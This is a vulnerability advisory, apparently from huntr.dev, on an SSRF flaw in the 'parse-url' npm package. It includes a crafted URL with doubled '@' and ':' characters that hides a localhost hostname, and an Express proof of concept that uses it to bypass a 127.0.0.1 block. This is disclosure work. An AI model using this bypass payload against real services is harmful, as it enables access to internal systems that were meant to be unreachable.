SSRF via Improper Input Validation

2022-06-1703:51:45

p0cas

www.huntr.dev

ssrf

improper input validation

hostname detection

EPSS

0.002

Percentile

57.1%

JSON

Description

Hostname is not detected because of improper handling of username and password. (Based on real cases)

Proof of Concept

❯ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("http://google:com:@@localhost"))'
{
  protocols: [ 'http' ],
  protocol: 'http',
  port: null,
  resource: 'google:com:@@localhost',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'http://google:com:@@localhost',
  query: [Object: null prototype] {}
}

When receiving the above URL, the hostname is localhost, but it is not detected.

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

const isLocal = () =&gt; (req, res, next) =&gt; (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
    ? next()
    : res.json({'state':'You\'re not locally'});

parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) =&gt; {
	if(parsed.resource == '127.0.0.1'){
		res.send('Not good');
	} else{
		http.get(parsed.href)
		res.send('Good');
	}
});

app.get('/ssrf_check', isLocal(), (req, res) =&gt;{
	console.log('ssrf bypass');
	res.send(true);
});

app.listen(9999);

The above PoC code forbids the use of 127.0.0.1 host. However, by using the above vulnerability, it is possible to bypass this and perform an SSRF attack.

EPSS

0.002

Percentile

57.1%

JSON

Related for 505A3D39-2723-4A06-B1F7-9B2D133C92E1